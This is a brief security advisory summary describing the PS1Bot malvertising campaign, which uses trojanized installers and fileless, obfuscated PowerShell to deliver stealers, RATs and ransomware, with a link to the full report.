PS1Bot Loader: Fileless Malware Spread Through Malvertising Ads

In August 2025, researchers uncovered a sophisticated malvertising campaign distributing the PS1Bot loader through search engine ads and compromised ad networks. Unsuspecting users searching for popular software were diverted to attacker-controlled domains hosting trojanized installers that mimicked legitimate applications.

Once executed, these installers trigger a multi-stage, in-memory infection chain designed to remain invisible to traditional security controls. At its core, the PS1Bot loader employs heavily obfuscated PowerShell and a modular payload delivery mechanism capable of deploying information stealers, remote access trojans (RATs), or ransomware on demand.

This campaign exemplifies the broader adversarial trend of abusing living-off-the-land binaries (LOLBins) such as PowerShell and Windows Installer, combined with social engineering through malvertising and SEO poisoning. By avoiding disk artefacts and executing entirely in memory, PS1Bot significantly complicates forensic analysis, impedes signature-based detection, and highlights the growing inadequacy of conventional antivirus solutions against modern, modular malware ecosystems.

Download the Full Report from our Blogs page: https://www.cyberstash.com/published-advisories/